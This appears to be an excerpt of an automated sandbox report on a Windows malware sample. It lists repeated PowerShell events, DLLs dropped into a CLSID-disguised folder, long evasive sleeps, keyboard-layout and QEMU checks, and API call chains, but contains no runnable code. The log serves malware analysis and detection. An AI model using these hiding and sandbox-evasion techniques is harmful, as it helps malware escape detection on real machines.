Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,23_2_00007FFE0E167694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE0E136078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE0E16B648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE0EB42738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE11EC4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE126D1D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,23_2_00007FFE13383058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4254Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5590Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8787Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7077Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2542Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 2798
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 5419
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\kInii6kXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\9qaNW6z6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\Jcf8nu5cJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\j8fz8FfXJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\HwfABz7sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\TLN3Eh0fJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\zFE1sfMYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\zCUeqzwCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\DYoNFfUYJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_23-60333
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-11349
Source: C:\Users\user\Desktop\file.exe TID: 6744Thread sleep time: -25920000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep count: 4254 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep count: 5590 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep count: 8787 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep count: 308 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep count: 7077 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 2542 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5180Thread sleep count: 211 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5180Thread sleep time: -105500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4960Thread sleep count: 203 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4960Thread sleep time: -101500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4588Thread sleep count: 50 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512Thread sleep count: 2798 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512Thread sleep time: -8394000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512Thread sleep count: 5419 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512Thread sleep time: -16257000s >= -30000s
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,5_2_00007FF73AFB3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF6547A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FF6EF6547A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E13A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0E13A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E161883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0E161883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0EB45BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE0EB45BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE11EC5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D2FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE126D2FE3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE133857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,23_2_00007FFE133857B3
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: file.exeBinary or memory string: =QemuLH
